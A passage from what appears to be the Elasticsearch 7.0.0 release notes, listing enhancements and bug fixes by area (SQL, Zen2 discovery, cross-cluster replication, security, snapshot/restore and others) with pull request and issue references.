Use SearchRequest copy constructor in ExpandSearchPhase {es-pull}36772[#36772] (issue: {es-issue}36641[#36641]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) -* Avoid BytesRef's copying in ScriptDocValues's Strings {es-pull}29581[#29581] (issue: {es-issue}29567[#29567]) - -Security:: -* Make credentials mandatory when launching xpack/migrate {es-pull}36197[#36197] (issues: {es-issue}29847[#29847], {es-issue}33972[#33972]) -* Move CAS operations in TokenService to sequence numbers {es-pull}38311[#38311] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Cleanup construction of interceptors {es-pull}38294[#38294] -* Add passphrase support to elasticsearch-keystore {es-pull}37472[#37472] (issue: {es-issue}32691[#32691]) -* Types removal security index template {es-pull}39705[#39705] (issue: {es-issue}38637[#38637]) -* Types removal security index template {es-pull}39542[#39542] (issue: {es-issue}38637[#38637]) - -Snapshot/Restore:: -* #31608 Add S3 Setting to Force Path Type Access {es-pull}34721[#34721] (issue: {es-issue}31608[#31608]) -* Allow Parallel Restore Operations {es-pull}36397[#36397] -* Repo Creation out of ClusterStateTask {es-pull}36157[#36157] (issue: {es-issue}9488[#9488]) -* Add read-only repository verification {es-pull}35731[#35731] (issue: {es-issue}35703[#35703]) -* RestoreService should update primary terms when restoring shards of existing indices {es-pull}38177[#38177] (issue: {es-issue}33888[#33888]) -* Allow open indices to be restored {es-pull}37733[#37733] -* Create specific exception for when snapshots are in progress {es-pull}37550[#37550] (issue: {es-issue}37541[#37541]) -* Make Atomic Blob Writes Mandatory {es-pull}37168[#37168] (issues: {es-issue}37011[#37011], {es-issue}37066[#37066]) -* Speed up HDFS Repository Writes {es-pull}37069[#37069] -* Implement Atomic Blob Writes for HDFS Repository {es-pull}37066[#37066] (issue: {es-issue}37011[#37011]) -* [API] spelling: repositories {es-pull}37053[#37053] (issue: {es-issue}37035[#37035]) -* Use CancellableThreads to Abort {es-pull}35901[#35901] (issue: {es-issue}21759[#21759]) -* S3 client encryption {es-pull}30513[#30513] (issues: {es-issue}11128[#11128], {es-issue}16843[#16843]) -* Mark Deleted Snapshot Directories with Tombstones {es-pull}40228[#40228] (issue: {es-issue}39852[#39852]) - -Stats:: -* Handle OS pretty name on old OS without OS release {es-pull}35453[#35453] (issue: {es-issue}35440[#35440]) - -Store:: -* Add RemoveCorruptedShardDataCommand {es-pull}32281[#32281] (issues: {es-issue}31389[#31389], {es-issue}32279[#32279]) -* Add option to force load term dict into memory {es-pull}39741[#39741] - -SQL:: -* Introduce support for NULL values {es-pull}34573[#34573] (issue: {es-issue}32079[#32079]) -* Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) -* Introduce NOW/CURRENT_TIMESTAMP function {es-pull}36562[#36562] (issue: {es-issue}36534[#36534]) -* Move requests' parameters to requests JSON body {es-pull}36149[#36149] (issue: {es-issue}35992[#35992]) -* Make INTERVAL millis optional {es-pull}36043[#36043] (issue: {es-issue}36032[#36032]) -* Implement data type verification for conditionals {es-pull}35916[#35916] (issue: {es-issue}35907[#35907]) -* Implement GREATEST and LEAST functions {es-pull}35879[#35879] (issue: {es-issue}35878[#35878]) -* Implement null safe equality operator `<=>` {es-pull}35873[#35873] (issue: {es-issue}35871[#35871]) -* SYS COLUMNS returns ODBC specific schema {es-pull}35870[#35870] (issue: {es-issue}35376[#35376]) -* Polish grammar for intervals {es-pull}35853[#35853] -* Add filtering to SYS TYPES {es-pull}35852[#35852] (issue: {es-issue}35342[#35342]) -* Implement NULLIF(expr1, expr2) function {es-pull}35826[#35826] (issue: {es-issue}35818[#35818]) -* Lock down JDBC driver {es-pull}35798[#35798] (issue: {es-issue}35437[#35437]) -* Implement NVL(expr1, expr2) {es-pull}35794[#35794] (issue: {es-issue}35782[#35782]) -* Implement ISNULL(expr1, expr2) {es-pull}35793[#35793] (issue: {es-issue}35781[#35781]) -* Implement IFNULL variant of COALESCE {es-pull}35762[#35762] (issue: {es-issue}35749[#35749]) -* XPack FeatureSet functionality {es-pull}35725[#35725] (issue: {es-issue}34821[#34821]) -* Perform lazy evaluation of mismatched mappings {es-pull}35676[#35676] (issues: {es-issue}35659[#35659], {es-issue}35675[#35675]) -* Improve validation of unsupported fields {es-pull}35675[#35675] (issue: {es-issue}35673[#35673]) -* Move internals from Joda to java.time {es-pull}35649[#35649] (issue: {es-issue}35633[#35633]) -* Allow look-ahead resolution of aliases for WHERE clause {es-pull}38450[#38450] (issue: {es-issue}29983[#29983]) -* Implement CURRENT_DATE {es-pull}38175[#38175] (issue: {es-issue}38160[#38160]) -* Generate relevant error message when grouping functions are not used in GROUP BY {es-pull}38017[#38017] (issue: {es-issue}37952[#37952]) -* Skip the nested and object field types in case of an ODBC request {es-pull}37948[#37948] (issue: {es-issue}37801[#37801]) -* Add protocol tests and remove jdbc_type from drivers response {es-pull}37516[#37516] (issues: {es-issue}36635[#36635], {es-issue}36882[#36882]) -* Remove slightly used meta commands {es-pull}37506[#37506] (issue: {es-issue}37409[#37409]) -* Describe aliases as views {es-pull}37496[#37496] (issue: {es-issue}37422[#37422]) -* Make `FULL` non-reserved keyword in the grammar {es-pull}37377[#37377] (issue: {es-issue}37376[#37376]) -* Use declared source for error messages {es-pull}37161[#37161] -* Improve error message when unable to translate to ES query DSL {es-pull}37129[#37129] (issue: {es-issue}37040[#37040]) -* [API] spelling: subtract {es-pull}37055[#37055] (issue: {es-issue}37035[#37035]) -* [API] spelling: similar {es-pull}37054[#37054] (issue: {es-issue}37035[#37035]) -* [API] spelling: input {es-pull}37048[#37048] (issue: {es-issue}37035[#37035]) -* Enhance message for PERCENTILE[_RANK] with field as 2nd arg {es-pull}36933[#36933] (issue: {es-issue}36903[#36903]) -* Preserve original source for each expression {es-pull}36912[#36912] (issue: {es-issue}36894[#36894]) -* Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) -* Enhance checks for inexact fields {es-pull}39427[#39427] (issue: {es-issue}38501[#38501]) -* Change the default precision for CURRENT_TIMESTAMP function {es-pull}39391[#39391] (issue: {es-issue}39288[#39288]) -* Add "fuzziness" option to QUERY and MATCH function predicates {es-pull}40529[#40529] (issue: {es-issue}40495[#40495]) -* Add "validate.properties" property to JDBC's allowed list of settings {es-pull}39050[#39050] (issue: {es-issue}38068[#38068]) - -Suggesters:: -* Remove unused empty constructors from suggestions classes {es-pull}37295[#37295] -* [API] spelling: likelihood {es-pull}37052[#37052] (issue: {es-issue}37035[#37035]) - -Task Management:: -* Periodically try to reassign unassigned persistent tasks {es-pull}36069[#36069] (issue: {es-issue}35792[#35792]) -* Only require task permissions {es-pull}35667[#35667] (issue: {es-issue}35573[#35573]) -* Retry if task can't be written {es-pull}35054[#35054] (issue: {es-issue}33764[#33764]) - -ZenDiscovery:: -* Introduce vote withdrawal {es-pull}35446[#35446] -* Add basic Zen1 transport-level BWC {es-pull}35443[#35443] -* Add diff-based publishing {es-pull}35290[#35290] -* Introduce auto_shrink_voting_configuration setting {es-pull}35217[#35217] -* Introduce transport API for cluster bootstrapping {es-pull}34961[#34961] -* Reconfigure cluster as its membership changes {es-pull}34592[#34592] (issue: {es-issue}33924[#33924]) -* Fail fast on disconnects {es-pull}34503[#34503] -* Add storage-layer disruptions to CoordinatorTests {es-pull}34347[#34347] -* Add low-level bootstrap implementation {es-pull}34345[#34345] -* Gather votes from all nodes {es-pull}34335[#34335] -* Add Cluster State Applier {es-pull}34257[#34257] -* Add safety phase to CoordinatorTests {es-pull}34241[#34241] -* Integrate FollowerChecker with Coordinator {es-pull}34075[#34075] -* Integrate LeaderChecker with Coordinator {es-pull}34049[#34049] -* Trigger join when active master detected {es-pull}34008[#34008] -* Update PeerFinder term on term bump {es-pull}33992[#33992] -* Calculate optimal cluster configuration {es-pull}33924[#33924] -* Introduce FollowersChecker {es-pull}33917[#33917] -* Integrate publication pipeline into Coordinator {es-pull}33771[#33771] -* Add DisruptableMockTransport {es-pull}33713[#33713] -* Implement basic cluster formation {es-pull}33668[#33668] -* Introduce LeaderChecker {es-pull}33024[#33024] -* Add leader-side join handling logic {es-pull}33013[#33013] -* Add PeerFinder#onFoundPeersUpdated {es-pull}32939[#32939] -* Introduce PreVoteCollector {es-pull}32847[#32847] -* Introduce ElectionScheduler {es-pull}32846[#32846] -* Introduce ElectionScheduler {es-pull}32709[#32709] -* Add HandshakingTransportAddressConnector {es-pull}32643[#32643] (issue: {es-issue}32246[#32246]) -* Add UnicastConfiguredHostsResolver {es-pull}32642[#32642] (issue: {es-issue}32246[#32246]) -* Cluster state publication pipeline {es-pull}32584[#32584] (issue: {es-issue}32006[#32006]) -* Introduce gossip-like discovery of master nodes {es-pull}32246[#32246] -* Add core coordination algorithm for cluster state publishing {es-pull}32171[#32171] (issue: {es-issue}32006[#32006]) -* Add term and config to cluster state {es-pull}32100[#32100] (issue: {es-issue}32006[#32006]) -* Add discovery types to cluster stats {es-pull}36442[#36442] -* Introduce `zen2` discovery type {es-pull}36298[#36298] -* Persist cluster states the old way on non-master-eligible nodes {es-pull}36247[#36247] (issue: {es-issue}3[#3]) -* Storage layer WriteStateException propagation {es-pull}36052[#36052] -* Implement Tombstone REST APIs {es-pull}36007[#36007] -* Update default for USE_ZEN2 to true {es-pull}35998[#35998] -* Add warning if cluster fails to form fast enough {es-pull}35993[#35993] -* Allow Setting a List of Bootstrap Nodes to Wait for {es-pull}35847[#35847] -* VotingTombstone class {es-pull}35832[#35832] -* PersistedState interface implementation {es-pull}35819[#35819] -* Support rolling upgrades from Zen1 {es-pull}35737[#35737] -* Add lag detector {es-pull}35685[#35685] -* Move ClusterState fields to be persisted to ClusterState.Metadata {es-pull}35625[#35625] -* Introduce ClusterBootstrapService {es-pull}35488[#35488] -* Introduce vote withdrawal {es-pull}35446[#35446] -* Add basic Zen1 transport-level BWC {es-pull}35443[#35443] -* Add elasticsearch-node detach-cluster tool {es-pull}37979[#37979] -* Deprecate minimum_master_nodes {es-pull}37868[#37868] -* Step down as master when configured out of voting configuration {es-pull}37802[#37802] (issue: {es-issue}37712[#37712]) -* Enforce cluster UUIDs {es-pull}37775[#37775] -* Bubble exceptions up in ClusterApplierService {es-pull}37729[#37729] -* Use m_m_nodes from Zen1 master for Zen2 bootstrap {es-pull}37701[#37701] -* Add tool elasticsearch-node unsafe-bootstrap {es-pull}37696[#37696] -* Report terms and version if cluster does not form {es-pull}37473[#37473] -* Bootstrap a Zen2 cluster once quorum is discovered {es-pull}37463[#37463] -* Zen2: Add join validation {es-pull}37203[#37203] -* Publish cluster states in chunks {es-pull}36973[#36973] - - - -[[bug-7.0.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix InternalAutoDateHistogram reproducible failure {es-pull}32723[#32723] (issue: {es-issue}32215[#32215]) -* fix MultiValuesSourceFieldConfig toXContent {es-pull}36525[#36525] (issue: {es-issue}36474[#36474]) -* Cache the score of the parent document in the nested agg {es-pull}36019[#36019] (issues: {es-issue}34555[#34555], {es-issue}35985[#35985]) -* Correct implemented interface of ParsedReverseNested {es-pull}35455[#35455] (issue: {es-issue}35449[#35449]) -* Handle IndexOrDocValuesQuery in composite aggregation {es-pull}35392[#35392] -* Don't load global ordinals with the `map` execution_hint {es-pull}37833[#37833] (issue: {es-issue}37705[#37705]) -* Issue #37303 - Invalid variance fix {es-pull}37384[#37384] (issue: {es-issue}37303[#37303]) -* Skip sibling pipeline aggregators reduction during non-final reduce {es-pull}40101[#40101] (issue: {es-issue}40059[#40059]) -* Extend nextDoc to delegate to the wrapped doc-value iterator for date_nanos {es-pull}39176[#39176] (issue: {es-issue}39107[#39107]) -* Only create MatrixStatsResults on final reduction {es-pull}38130[#38130] (issue: {es-issue}37587[#37587]) - -Allocation:: -* Fix _host based require filters {es-pull}38173[#38173] -* ALLOC: Fail Stale Primary Alloc. Req. without Data {es-pull}37226[#37226] (issue: {es-issue}37098[#37098]) - -Analysis:: -* Close #26771: beider_morse phonetic encoder failure when languageset unspecified {es-pull}26848[#26848] (issue: {es-issue}26771[#26771]) -* Fix PreConfiguredTokenFilters getSynonymFilter() implementations {es-pull}38839[#38839] (issue: {es-issue}38793[#38793]) - -Audit:: -* Fix origin.type for connection_* events {es-pull}36410[#36410] -* Fix IndexAuditTrail rolling restart on rollover edge {es-pull}35988[#35988] (issue: {es-issue}33867[#33867]) -* Fix NPE in Logfile Audit Filter {es-pull}38120[#38120] (issue: {es-issue}38097[#38097]) -* LoggingAuditTrail correctly handle ReplicatedWriteRequest {es-pull}39925[#39925] (issue: {es-issue}39555[#39555]) - -Authorization:: -* Empty GetAliases authorization fix {es-pull}34444[#34444] (issue: {es-issue}31952[#31952]) - -Authentication:: -* Fix kerberos setting registration {es-pull}35986[#35986] (issues: {es-issue}30241[#30241], {es-issue}35942[#35942]) -* Add support for Kerberos V5 Oid {es-pull}35764[#35764] (issue: {es-issue}34763[#34763]) -* Enhance parsing of StatusCode in SAML Responses {es-pull}38628[#38628] -* Limit token expiry to 1 hour maximum {es-pull}38244[#38244] -* Fix expired token message in Exception header {es-pull}37196[#37196] -* Fix NPE in CachingUsernamePasswordRealm {es-pull}36953[#36953] (issue: {es-issue}36951[#36951]) -* Allow non super users to create API keys {es-pull}40028[#40028] (issue: {es-issue}40029[#40029]) -* Use consistent view of realms for authentication {es-pull}38815[#38815] (issue: {es-issue}30301[#30301]) -* Correct authenticate response for API key {es-pull}39684[#39684] -* Fix security index auto-create and state recovery race {es-pull}39582[#39582] - -Build:: -* Use explicit deps on test tasks for check {es-pull}36325[#36325] -* Fix jdbc jar pom to not include deps {es-pull}36036[#36036] (issue: {es-issue}32014[#32014]) -* Fix official plugins list {es-pull}35661[#35661] (issue: {es-issue}35623[#35623]) - -CCR:: -* Fix follow stats API's follower index filtering feature {es-pull}36647[#36647] -* AutoFollowCoordinator should tolerate that auto follow patterns may be removed {es-pull}35945[#35945] (issue: {es-issue}35937[#35937]) -* Only auto follow indices when all primary shards have started {es-pull}35814[#35814] (issue: {es-issue}35480[#35480]) -* Avoid NPE in follower stats when no tasks metadata {es-pull}35802[#35802] -* Fix the names of CCR stats endpoints in usage API {es-pull}35438[#35438] -* Prevent CCR recovery from missing documents {es-pull}38237[#38237] -* Fix file reading in ccr restore service {es-pull}38117[#38117] -* Correct argument names in update mapping/settings from leader {es-pull}38063[#38063] -* Ensure changes requests return the latest mapping version {es-pull}37633[#37633] -* Do not set fatal exception when shard follow task is stopped. {es-pull}37603[#37603] -* Add fatal_exception field for ccr stats in monitoring mapping {es-pull}37563[#37563] -* Do not add index event listener if CCR disabled {es-pull}37432[#37432] -* When removing an AutoFollower also mark it as removed. {es-pull}37402[#37402] (issue: {es-issue}36761[#36761]) -* Make shard follow tasks more resilient for restarts {es-pull}37239[#37239] (issue: {es-issue}37231[#37231]) -* Resume follow Api should not require a request body {es-pull}37217[#37217] (issue: {es-issue}37022[#37022]) -* Report error if auto follower tries auto follow a leader index with soft deletes disabled {es-pull}36886[#36886] (issue: {es-issue}33007[#33007]) -* Remote cluster license checker and no license info. {es-pull}36837[#36837] (issue: {es-issue}36815[#36815]) -* Make CCR resilient against missing remote cluster connections {es-pull}36682[#36682] (issues: {es-issue}36255[#36255], {es-issue}36667[#36667]) -* AutoFollowCoordinator and follower index already created {es-pull}36540[#36540] (issue: {es-issue}33007[#33007]) -* Safe publication of AutoFollowCoordinator {es-pull}40153[#40153] (issue: {es-issue}38560[#38560]) -* Enable reading auto-follow patterns from x-content {es-pull}40130[#40130] (issue: {es-issue}40128[#40128]) -* Stop auto-followers on shutdown {es-pull}40124[#40124] -* Protect against the leader index being removed {es-pull}39351[#39351] (issue: {es-issue}39308[#39308]) -* Handle the fact that `ShardStats` instance may have no commit or seqno stats {es-pull}38782[#38782] (issue: {es-issue}38779[#38779]) -* Fix LocalIndexFollowingIT#testRemoveRemoteConnection() test {es-pull}38709[#38709] (issue: {es-issue}38695[#38695]) -* Fix shard follow task startup error handling {es-pull}39053[#39053] (issue: {es-issue}38779[#38779]) -* Filter out upgraded version index settings when starting index following {es-pull}38838[#38838] (issue: {es-issue}38835[#38835]) - -Circuit Breakers:: -* Modify `BigArrays` to take name of circuit breaker {es-pull}36461[#36461] (issue: {es-issue}31435[#31435]) - -Core:: -* Fix CompositeBytesReference#slice to not throw AIOOBE with legal offsets. {es-pull}35955[#35955] (issue: {es-issue}35950[#35950]) -* Suppress CachedTimeThread in hot threads output {es-pull}35558[#35558] (issue: {es-issue}23175[#23175]) -* Upgrade to Joda 2.10.1 {es-pull}35410[#35410] (issue: {es-issue}33749[#33749]) - -CRUD:: -* Fix Reindex from remote query logic {es-pull}36908[#36908] -* Synchronize WriteReplicaResult callbacks {es-pull}36770[#36770] -* Cascading primary failure lead to MSU too low {es-pull}40249[#40249] -* Store Pending Deletions Fix {es-pull}40345[#40345] (issue: {es-issue}40249[#40249]) -* ShardBulkAction ignore primary response on primary {es-pull}38901[#38901] - -Cluster Coordination:: -* Fix node tool cleanup {es-pull}39389[#39389] -* Avoid serialising state if it was already serialised {es-pull}39179[#39179] -* Do not perform cleanup if Manifest write fails with dirty exception {es-pull}40519[#40519] (issue: {es-issue}39077[#39077]) -* Cache compressed cluster state size {es-pull}39827[#39827] (issue: {es-issue}39806[#39806]) -* Drop node if asymmetrically partitioned from master {es-pull}39598[#39598] -* Fixing the custom object serialization bug in diffable utils. {es-pull}39544[#39544] -* Clean GatewayAllocator when stepping down as master {es-pull}38885[#38885] - -Distributed:: -* Combine the execution of an exclusive replica operation with primary term update {es-pull}36116[#36116] (issue: {es-issue}35850[#35850]) -* ActiveShardCount should not fail when closing the index {es-pull}35936[#35936] -* TransportVerifyShardBeforeCloseAction should force a flush {es-pull}38401[#38401] (issues: {es-issue}33888[#33888], {es-issue}37961[#37961]) -* Fix limit on retaining sequence number {es-pull}37992[#37992] (issue: {es-issue}37165[#37165]) -* Close Index API should force a flush if a sync is needed {es-pull}37961[#37961] (issues: {es-issue}33888[#33888], {es-issue}37426[#37426]) -* Force Refresh Listeners when Acquiring all Operation Permits {es-pull}36835[#36835] -* Replaced the word 'shards' with 'replicas' in an error message. (#36234) {es-pull}36275[#36275] (issue: {es-issue}36234[#36234]) -* Ignore waitForActiveShards when syncing leases {es-pull}39224[#39224] (issue: {es-issue}39089[#39089]) -* Fix synchronization in LocalCheckpointTracker#contains {es-pull}38755[#38755] (issues: {es-issue}33871[#33871], {es-issue}38633[#38633]) -* Enforce retention leases require soft deletes {es-pull}39922[#39922] (issue: {es-issue}39914[#39914]) -* Treat TransportService stopped error as node is closing {es-pull}39800[#39800] (issue: {es-issue}39584[#39584]) -* Use cause to determine if node with primary is closing {es-pull}39723[#39723] (issue: {es-issue}39584[#39584]) -* Don’t ack if unable to remove failing replica {es-pull}39584[#39584] (issue: {es-issue}39467[#39467]) -* Fix NPE on Stale Index in IndicesService {es-pull}38891[#38891] (issue: {es-issue}38845[#38845]) - -Engine:: -* Set Lucene version upon index creation. {es-pull}36038[#36038] (issue: {es-issue}33826[#33826]) -* Wrap can_match reader with ElasticsearchDirectoryReader {es-pull}35857[#35857] -* Copy checkpoint atomically when rolling generation {es-pull}35407[#35407] -* Subclass NIOFSDirectory instead of using FileSwitchDirectory {es-pull}37140[#37140] (issues: {es-issue}36668[#36668], {es-issue}37111[#37111]) -* Bubble up exception when processing NoOp {es-pull}39338[#39338] (issue: {es-issue}38898[#38898]) -* ReadOnlyEngine should update translog recovery state information {es-pull}39238[#39238] -* Advance max_seq_no before add operation to Lucene {es-pull}38879[#38879] (issue: {es-issue}31629[#31629]) - -Features/Features:: -* Only count some fields types for deprecation check {es-pull}40166[#40166] -* Deprecation check for indices with very large numbers of fields {es-pull}39869[#39869] (issue: {es-issue}39851[#39851]) - -Features/ILM:: -* Preserve ILM operation mode when creating new lifecycles {es-pull}38134[#38134] (issues: {es-issue}38229[#38229], {es-issue}38230[#38230]) -* Retry ILM steps that fail due to SnapshotInProgressException {es-pull}37624[#37624] (issues: {es-issue}37541[#37541], {es-issue}37552[#37552]) -* Remove `indexing_complete` when removing policy {es-pull}36620[#36620] -* Handle failure to release retention leases in ILM {es-pull}39281[#39281] (issue: {es-issue}39181[#39181]) -* Correct ILM metadata minimum compatibility version {es-pull}40569[#40569] (issue: {es-issue}40565[#40565]) -* Handle null retention leases in WaitForNoFollowersStep {es-pull}40477[#40477] -* Allow ILM to stop if indices have nonexistent policies {es-pull}40820[#40820] (issue: {es-issue}40824[#40824]) - -Features/Indices APIs:: -* Validate top-level keys for create index request (#23755) {es-pull}23869[#23869] (issue: {es-issue}23755[#23755]) -* Reject delete index requests with a body {es-pull}37501[#37501] (issue: {es-issue}8217[#8217]) -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Get Aliases with wildcard exclusion expression {es-pull}34230[#34230] (issues: {es-issue}33518[#33518], {es-issue}33805[#33805], {es-issue}34144[#34144]) - -Features/Ingest:: -* Fix Deprecation Warning in Script Proc. {es-pull}32407[#32407] -* Support unknown fields in ingest pipeline map configuration {es-pull}38352[#38352] (issue: {es-issue}36938[#36938]) -* Ingest node - user_agent, move device parsing to an object {es-pull}38115[#38115] (issues: {es-issue}37329[#37329], {es-issue}38094[#38094]) -* Fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* Support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) -* Ingest ingest then create index {es-pull}39607[#39607] (issues: {es-issue}32758[#32758], {es-issue}32786[#32786], {es-issue}36545[#36545]) - -Features/Java High Level REST Client:: -* Drop extra level from user parser {es-pull}34932[#34932] -* Update IndexTemplateMetadata to allow unknown fields {es-pull}38448[#38448] (issue: {es-issue}36938[#36938]) -* `if_seq_no` and `if_primary_term` parameters aren't wired correctly in REST Client's CRUD API {es-pull}38411[#38411] -* Update Rollup Caps to allow unknown fields {es-pull}38339[#38339] (issue: {es-issue}36938[#36938]) -* Fix ILM explain response to allow unknown fields {es-pull}38054[#38054] (issue: {es-issue}36938[#36938]) -* Fix ILM status to allow unknown fields {es-pull}38043[#38043] (issue: {es-issue}36938[#36938]) -* Fix ILM Lifecycle Policy to allow unknown fields {es-pull}38041[#38041] (issue: {es-issue}36938[#36938]) -* Update authenticate to allow unknown fields {es-pull}37713[#37713] (issue: {es-issue}36938[#36938]) -* Update verify repository to allow unknown fields {es-pull}37619[#37619] (issue: {es-issue}36938[#36938]) -* Update get users to allow unknown fields {es-pull}37593[#37593] (issue: {es-issue}36938[#36938]) -* Update Execute Watch to allow unknown fields {es-pull}37498[#37498] (issue: {es-issue}36938[#36938]) -* Update Put Watch to allow unknown fields {es-pull}37494[#37494] (issue: {es-issue}36938[#36938]) -* Update Delete Watch to allow unknown fields {es-pull}37435[#37435] (issue: {es-issue}36938[#36938]) -* Fix rest reindex test for IPv4 addresses {es-pull}37310[#37310] -* Fix weighted_avg parser not found for RestHighLevelClient {es-pull}37027[#37027] (issue: {es-issue}36861[#36861]) - -Features/Java Low Level REST Client:: -* Remove I/O pool blocking sniffing call from onFailure callback, add some logic around host exclusion {es-pull}27985[#27985] (issue: {es-issue}27984[#27984]) -* Fix potential IllegalCapacityException in LLRC when selecting nodes {es-pull}37821[#37821] - -Features/Monitoring:: -* Allow built-in monitoring_user role to call GET _xpack API {es-pull}38060[#38060] (issue: {es-issue}37970[#37970]) -* Don't emit deprecation warnings on calls to the monitoring bulk API. {es-pull}39805[#39805] (issue: {es-issue}39336[#39336]) - -Features/Watcher:: -* Ignore system locale/timezone in croneval CLI tool {es-pull}33215[#33215] -* Support merge nested Map in list for JIRA configurations {es-pull}37634[#37634] (issue: {es-issue}30068[#30068]) -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Ensures watch definitions are valid json {es-pull}30692[#30692] (issue: {es-issue}29746[#29746]) -* Use non-ILM template setting up watch history template & ILM disabled {es-pull}39325[#39325] (issue: {es-issue}38805[#38805]) -* Only flush Watcher's bulk processor if Watcher is enabled {es-pull}38803[#38803] (issue: {es-issue}38798[#38798]) -* Fix Watcher stats class cast exception {es-pull}39821[#39821] (issue: {es-issue}39780[#39780]) -* Use any index specified by .watches for Watcher {es-pull}39541[#39541] (issue: {es-issue}39478[#39478]) -* Resolve concurrency with watcher trigger service {es-pull}39092[#39092] (issue: {es-issue}39087[#39087]) -* Metric on watcher stats is a list not an enum {es-pull}39114[#39114] - -Geo:: -* Test `GeoShapeQueryTests#testPointsOnly` fails {es-pull}27454[#27454] -* More robust handling of ignore_malformed in geoshape parsing {es-pull}35603[#35603] (issues: {es-issue}34047[#34047], {es-issue}34498[#34498]) -* Better handling of malformed geo_points {es-pull}35554[#35554] (issue: {es-issue}35419[#35419]) -* Enables coerce support in WKT polygon parser {es-pull}35414[#35414] (issue: {es-issue}35059[#35059]) -* Fix GeoHash PrefixTree BWC {es-pull}38584[#38584] (issue: {es-issue}38494[#38494]) -* Do not normalize the longitude with value -180 for Lucene shapes {es-pull}37299[#37299] (issue: {es-issue}37297[#37297]) -* Geo Point parse error fix {es-pull}40447[#40447] (issue: {es-issue}17617[#17617]) - -Highlighting:: -* Bug fix for AnnotatedTextHighlighter - port of 39525 {es-pull}39750[#39750] (issue: {es-issue}39525[#39525]) - -Infra/Core:: -* Ensure shard is refreshed once it's inactive {es-pull}27559[#27559] (issue: {es-issue}27500[#27500]) -* Bubble-up exceptions from scheduler {es-pull}38317[#38317] (issue: {es-issue}38014[#38014]) -* Revert back to joda's multi date formatters {es-pull}36814[#36814] (issues: {es-issue}36447[#36447], {es-issue}36602[#36602]) -* Propagate Errors in executors to uncaught exception handler {es-pull}36137[#36137] (issue: {es-issue}28667[#28667]) -* Correct name of basic_date_time_no_millis {es-pull}39367[#39367] -* Allow single digit milliseconds in strict date parsing {es-pull}40676[#40676] (issue: {es-issue}40403[#40403]) -* Parse composite patterns using ClassicFormat.parseObject {es-pull}40100[#40100] (issue: {es-issue}39916[#39916]) -* Bat scripts to work with JAVA_HOME with parantheses {es-pull}39712[#39712] (issues: {es-issue}30606[#30606], {es-issue}33405[#33405], {es-issue}38578[#38578], {es-issue}38624[#38624]) -* Change licence expiration date pattern {es-pull}39681[#39681] (issue: {es-issue}39136[#39136]) -* Fix DateFormatters.parseMillis when no timezone is given {es-pull}39100[#39100] (issue: {es-issue}39067[#39067]) -* Don't close caches while there might still be in-flight requests. {es-pull}38958[#38958] (issue: {es-issue}37117[#37117]) -* Allow single digit milliseconds in strict date parsing {es-pull}40676[#40676] (issue: {es-issue}40403[#40403]) - -Infra/Packaging:: -* Remove NOREPLACE for /etc/elasticsearch in rpm and deb {es-pull}37839[#37839] -* Packaging: Update marker used to allow ELASTIC_PASSWORD {es-pull}37243[#37243] (issue: {es-issue}37240[#37240]) -* Remove permission editing in postinst {es-pull}37242[#37242] (issue: {es-issue}37143[#37143]) -* Some elasticsearch-cli tools could not be run not from ES_HOME {es-pull}39937[#39937] -* Obsolete pre 7.0 noarch package in rpm {es-pull}39472[#39472] (issue: {es-issue}39414[#39414]) -* Suppress error message when `/proc/sys/vm/max_map_count` is not exists. {es-pull}35933[#35933] -* Use TAR instead of DOCKER build type before 6.7.0 {es-pull}40723[#40723] (issues: {es-issue}39378[#39378], {es-issue}40511[#40511]) -* Source additional files correctly in elasticsearch-cli {es-pull}40890[#40890] (issue: {es-issue}40889[#40889]) - -Infra/REST API:: -* Reject all requests that have an unconsumed body {es-pull}37504[#37504] (issues: {es-issue}30792[#30792], {es-issue}37501[#37501], {es-issue}8217[#8217]) -* Fix #38623 remove xpack namespace REST API {es-pull}38625[#38625] -* Remove the "xpack" namespace from the REST API {es-pull}38623[#38623] -* Update spec files that erroneously documented parts as optional {es-pull}39122[#39122] -* ilm.explain_lifecycle documents human again {es-pull}39113[#39113] -* Index on rollup.rollup_search.json is a list {es-pull}39097[#39097] - -Infra/Scripting:: -* Fix Painless void return bug {es-pull}38046[#38046] -* Correct bug in ScriptDocValues {es-pull}40488[#40488] - -Infra/Settings:: -* Change format how settings represent lists / array {es-pull}26723[#26723] -* Fix setting by time unit {es-pull}37192[#37192] -* Fix handling of fractional byte size value settings {es-pull}37172[#37172] -* Fix handling of fractional time value settings {es-pull}37171[#37171] - -Infra/Transport API:: -* Remove version read/write logic in Verify Response {es-pull}30879[#30879] (issue: {es-issue}30807[#30807]) -* Enable muted Repository test {es-pull}30875[#30875] (issue: {es-issue}30807[#30807]) -* Bad regex in CORS settings should throw a nicer error {es-pull}29108[#29108] - -Index APIs:: -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Raise a 404 exception when document source is not found (#33384) {es-pull}34083[#34083] (issue: {es-issue}33384[#33384]) - -Ingest:: -* Fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* Support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) -* Support default pipeline through an alias {es-pull}36231[#36231] (issue: {es-issue}35817[#35817]) - -License:: -* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135]) -* Do not serialize basic license exp in x-pack info {es-pull}30848[#30848] -* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135]) - -Machine Learning:: -* Interrupt Grok in file structure finder timeout {es-pull}36588[#36588] -* Prevent stack overflow while copying ML jobs and datafeeds {es-pull}36370[#36370] (issue: {es-issue}36360[#36360]) -* Adjust file structure finder 